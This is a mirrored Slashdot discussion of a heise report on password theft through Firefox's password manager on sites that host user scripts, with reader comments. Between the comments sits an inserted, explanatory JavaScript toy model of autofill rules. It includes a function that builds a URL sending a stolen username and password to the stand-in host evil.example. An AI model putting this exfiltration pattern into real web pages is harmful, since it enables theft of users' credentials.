Slashdot Mirror


Holes Remain Open in Firefox Password Manager

juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"

10 of 191 comments

  1. Firefox no longer safe? by JamesD_UK · Score: 4, Funny

    That's it, I'm leaving the Internet. Forever.

    1. Re:Firefox no longer safe? by jimbug · Score: 4, Funny

      can I have your karma?

      --
      Bite my shiny metal ass.
    2. Re:Firefox no longer safe? by dvice_null · Score: 4, Insightful

      It is not about the safety of Firefox. It is about the safety of websites that allow users to insert JavaScript code into their sites. It's like a bank which would allow anyone to step behind the desk and act as an employee of the bank.

      But they can only "steal" the passwords of that website. They can't steal all your passwords. So just remember to select different passwords for websites that might allow users to insert JavaScript code on the site. Then it doesn't matter that much if they manage to steal your passwords.

      Or use NoScript as suggested. Or simply don't use such websites, as they clearly don't think much about users' security.

  2. Possible fix by Arthur B. · Score: 4, Interesting

    Do not use a pull model but a push model like the bugmenot extension. A right click in the login form would allow you to automatically enter saved information. It's much safer.

    --
    ☭ = 卐
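The mechanism the story summary describes (a page on the same site, written by another user, that the password manager fills on load and whose script then reads the fields) and the "push" alternative from the "Possible fix" comment above, as an added example that is not code from the Slashdot story, the heise demo, Mozilla or the BugMeNot extension. It is a toy model run in Node: the saved login, the site names, the collector URL and the two fill rules (origin only, and origin plus form action) are constructed for the illustration and are not a claim about the browser's actual matching logic.

```javascript
// Added example: toy model of a browser password manager on a site where users
// can host pages containing their own script. All names and URLs are constructed.

// Toy password store: a saved login remembers the origin (scheme + host) and the
// action URL of the form it was saved from. Simplified, not a real browser store.
const SAVED_LOGINS = [
  {
    origin: 'https://social.example',
    action: 'https://social.example/login',
    username: 'alice',
    password: 'hunter2',
  },
];

// Stand-in for a DOM login form: where it lives, where it submits, its fields.
function makeForm(origin, action) {
  return { origin, action, fields: { username: '', password: '' } };
}

// Fill rule A (constructed): fill any login form served from a saved origin.
function matchByOrigin(login, form) {
  return login.origin === form.origin;
}

// Fill rule B (constructed): also require the form to submit to the saved
// action URL, so a form that posts off-site is left empty.
function matchByOriginAndAction(login, form) {
  return matchByOrigin(login, form) && login.action === form.action;
}

// "Pull" model: the browser fills the first matching login as the page loads.
function autofillOnLoad(store, form, rule) {
  const login = store.find((l) => rule(l, form));
  if (login) {
    form.fields.username = login.username;
    form.fields.password = login.password;
  }
  return form;
}

// "Push" model (the "Possible fix" comment): fields stay empty until the user
// explicitly asks the browser to fill them, e.g. from a context menu.
function fillOnUserRequest(store, form, rule, userRequested) {
  return userRequested ? autofillOnLoad(store, form, rule) : form;
}

// What inline script on the page can read right after load: same-origin script
// may read any field's value, so whatever the browser filled in is readable.
function scriptReads(form) {
  return { username: form.fields.username, password: form.fields.password };
}

// Classic exfiltration: encode the stolen values into a URL on the attacker's
// host; a real page would assign this to `new Image().src`.
function exfilUrl(stolen, collector = 'https://evil.example/collect') {
  const u = encodeURIComponent(stolen.username);
  const p = encodeURIComponent(stolen.password);
  return `${collector}?u=${u}&p=${p}`;
}

// A profile page on social.example controlled by a malicious user. It carries
// a hidden login form whose action is whatever the attacker chose.
function attackerPage(action) {
  return makeForm('https://social.example', action);
}

// Run the scenarios from the story and the comments; report what the
// attacker's script reads from the password field in each.
function runScenarios() {
  const offSite = 'https://evil.example/collect';
  const realLogin = 'https://social.example/login';
  return {
    // Rule A: any form on the origin is filled; the script reads the password.
    originOnly: scriptReads(autofillOnLoad(
      SAVED_LOGINS, attackerPage(offSite), matchByOrigin)).password,
    // Rule B leaves a form that posts off-site empty ...
    actionCheckOffSite: scriptReads(autofillOnLoad(
      SAVED_LOGINS, attackerPage(offSite), matchByOriginAndAction)).password,
    // ... but the attacker points the form at the real login URL, the browser
    // fills it, and same-origin script reads it anyway: the door still open.
    actionCheckRealAction: scriptReads(autofillOnLoad(
      SAVED_LOGINS, attackerPage(realLogin), matchByOriginAndAction)).password,
    // Push model: nothing is filled on load, so script run at load gets nothing.
    pushModelOnLoad: scriptReads(fillOnUserRequest(
      SAVED_LOGINS, attackerPage(realLogin), matchByOriginAndAction, false)).password,
    // The saved login is scoped to its origin: a page on another host gets
    // nothing ("they can only steal the passwords of that website").
    otherOrigin: scriptReads(autofillOnLoad(
      SAVED_LOGINS, makeForm('https://bank.example', realLogin), matchByOrigin)).password,
  };
}

const RESULTS = runScenarios();
console.log(RESULTS);
console.log('exfil URL under rule A:',
  exfilUrl({ username: 'alice', password: RESULTS.originOnly }));
```

The point the model makes is the one in the summary: once a site lets other users run script in the site's own origin, no matching rule on the browser side can tell a legitimate login form from an attacker's copy of it, because the attacker can make the copy identical; only not filling until the user acts (the push model) or not running the script at all (NoScript) takes the credentials out of the script's reach.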
  3. password complexity by farker haiku · Score: 4, Interesting

    I used to think (back in my tech support days) that people who couldn't remember their password were just plain stupid. These days, I work in a large firm that has tons of different passwords for everything. Unix passwords, windows passwords, spam mail setting utility password, time tracking utilities have passwords, passwords are required for clearcase/clearquest, remote login, etc. Each of them has different password complexity rules. I no longer criticize people for forgetting their password.

    --
    Your sig(k) has been stolen. There is a puff of smoke!
  4. Clarification by jojoba_oil · Score: 5, Informative

    > Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function.

    That's very misleading. Allow me to clarify:

    Users could also disable JavaScript, which in the age of Web 2.0 would cause many pages to display incorrectly. A better alternative is NoScript!, an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.

  5. Firefox password manager by wile_e_wonka · Score: 4, Interesting

    The thing that scared me away from the password manager in Firefox was a program called System Info for Windows. It lists all sorts of things about your computer--click on "Secrets." It searches for passwords in several programs--I have a few passwords saved in FF and the vast majority in Opera. I saw both programs mentioned in its analysis (meaning it searched both FF and Opera for saved passwords). It listed every saved FF password but no Opera passwords.

    It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.

    1. Re:Firefox password manager by Derek Pomery · Score: 4, Informative

      Your first mistake is not setting a master password in Firefox.
      Once you do that it won't be able to read them either.
      Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera, so the program doesn't even look for them.

      --
      -- perl -e'print pack"H*","6e656d6f406d38792e6f7267"' /. ate my old sig. Bastards.
  6. Password Managers and Simple Passwords by andrewd18 · Score: 5, Insightful

    > On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.

    Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password. The only thing stopping people from using simplistic passwords is the quality of the IT department's restrictions. I bet every salesperson in my office would use "gocubsgo" as their password if our IT department didn't demand at least one capital letter and a number. As such, their passwords are now "goCubsgo2007".

    Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."

    Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.

    I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.
  7. Re:stupid features by dvice_null · Score: 4, Insightful

    > Don't want to remember all your passwords? Don't use sites that require passwords.

    Or more specifically: Don't use the internet. How many webmail services do you know that don't use a password? You couldn't even write to Slashdot, except anonymously.

    > Do you trust your real-life keys to be managed by a third party, then wonder how someone broke into your house without forced entry?

    Yes, a third party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be the number one suspects. So far I have never been robbed by the key holders, nor have I ever heard of a case where someone else had been.

    > Having something "remember" your passwords defeats the purpose of having passwords.

    Not really. It just makes the password behave more like client certificates that automatically identify the client to the server.